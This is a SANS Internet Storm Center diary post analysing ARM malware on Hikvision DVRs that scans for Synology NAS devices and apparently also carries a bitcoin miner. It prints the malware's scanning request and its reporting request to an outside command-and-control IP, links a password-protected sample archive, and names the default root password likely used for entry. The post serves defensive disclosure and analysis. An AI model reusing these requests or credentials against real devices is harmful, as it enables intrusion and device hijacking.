Threat Level: green Handler on Duty: Lenny Zeltser

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

More Device Malware: This is why your DVR attacked my Synology Disk Station (and now with Bitcoin Miner!)

Published: 2014-03-31
Last Updated: 2014-03-31 17:29:48 UTC
by Johannes Ullrich (Version: 1)
6 comment(s)

Update: Just found what looks like a bitcoin miner on the infected DVR. There are two more binaries. D72BNr, the bitcoin miner (according to the usage info based on strings) and mzkk8g, which looksl ike a simplar http agent, maybe to download additional tools easily (similar to curl/wget which isn't installed on this DVR by default). I will add these two files to https://isc.sans.edu/diaryimages/hikvision.zip shortly.

Last week, we reported that some of the hosts scanning for port 5000 are DVRs (to be more precise: Hikvision DVRs, commonly used to record video from surveillance cameras [1] ).

Today, we were able to recover the malware responsible. You can download the malware here https://isc.sans.edu/diaryimages/hikvision.zip (password: infected) .

The malware resides in /dev/cmd.so . A number of additional suspect files where located in the /dev directory which we still need to recover / analyze from the test system. The compromisse of the DVR likely happened via an exposed telnet port and a default root password (12345). 

Analysis of the malware is still ongoing, and any help is appreciated (see link to malware above). Here are some initial findings:

- The malware is an ARM binary, indicating that it is targeting devices, not your typical x86 Linux server.
- The malware scans for Synology devices exposed on port 5000. The http request sent by the malware:

GET /webman/info.cgi?host= HTTP/1.0
Host: [IP Address of the Target]:5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
- it then extracts the firmware version details and transmits them to 162.219.57.8. The request used for this reporting channel:
 
GET /k.php?h=%lu HTTP/1.0
Host: 162.219.57.8
User-Agent: Ballsack
Connection: close
 
So in short, this malware is just scanning for vulnerable devices, and the actual exploit will likely come later.
 
[1] http://www.hikvision.com/en/us/Products_show.asp?id=4258

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Keywords: dvr synology
6 comment(s)
Meet Johannes Ullrich at SANSFIRE!
Diary Archives